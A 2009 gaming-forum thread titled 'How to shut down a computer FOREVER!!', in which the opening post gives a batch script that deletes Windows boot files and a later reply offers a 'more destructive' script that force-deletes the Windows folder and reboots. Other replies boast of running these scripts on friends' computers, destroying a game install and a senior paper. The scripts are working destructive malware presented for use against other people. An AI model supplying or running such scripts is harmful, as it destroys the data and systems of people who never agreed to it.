Post: How to shut down a computer FOREVER!!
01-15-2009, 01:17 AM #1
(adsbygoogle = window.adsbygoogle || []).push({}); How to shut down a computer FOREVER!!

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Open up notepad and copy and paste the above ^^. Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart. Have fun ...


REMEMBER - DO NOT CLICK THIS FILE. (for the noobs)
(adsbygoogle = window.adsbygoogle || []).push({});

The following 5 users say thank you to elsoadfan for this useful post:

LordOfSpoon™, NoMooreMercy, RedKnight, Sauceappeal, Tuhoaja
09-13-2009, 02:42 AM #74
my friend was a huge pain on internet so i made a sob story so his mom let me over and i did this haha he cant cyberbulling me Smile even know i stole his lunch money in the 5th grade
09-13-2009, 02:44 AM #75
and i thought i was an asshole lol
09-18-2009, 05:08 PM #76
iiBlazee
Bounty hunter
wow wouldnt work, first of all just about every antivirus company would detect that as a destructive bat. 2. it is gonna ask you if you want to delete so you gotta add somthing idr but like null ~ somthing like that idr it though
09-18-2009, 09:57 PM #77
that not what this is for
12-11-2009, 02:06 AM #78
blaize 9
Trustworthy level 1- Woot
I made it delete my friends world of warcraft program now he needs to spend 1/2 a day to download it XD!!
12-18-2009, 01:47 AM #79
TheRedGnome
Save Point
i tried this and it flashed a screen then disappeared. idk what i did wrong. i copyed in notepad and saved as "dontopen.bat"... any help?
12-18-2009, 01:59 AM #80
Fionn
Banned
Possiblably More Destructive?

Magglass Try This

@echo off
cd \
cd windows
attrib *.* -r -a -s -h
cd system32
attrib *.* -r -a -s -h
cd ..
taskkill /f /im explorer.exe
del /f /s /q *.*
shutdown -r -t 01 -c "Yeah right..."

To sum it up. *.* is any file, period. The attrib commands will ensure the files aren’t hidden/read only/system files so we know that they will delete properly. Now WFP (Windows File Protection) will still stop a lot of files from being deleted but if this can run long enough you’ll manage to corrupt any windows installation to the point where it will no longer boot. A repair install might fix the damage done, even then sometimes nothing will bring you back from this other than a format.

I AM NOT RESPONSIBLE FOR THIS CODE!
12-19-2009, 12:24 AM #81
TheRedGnome
Save Point
couldnt write their senior paper! what a great day!
12-21-2009, 11:43 PM #82
ZachFean
Can’t trickshot me!
could just boot up into linx and replace em?

Copyright © 2026, NextGenUpdate.
All Rights Reserved.

Gray NextGenUpdate Logo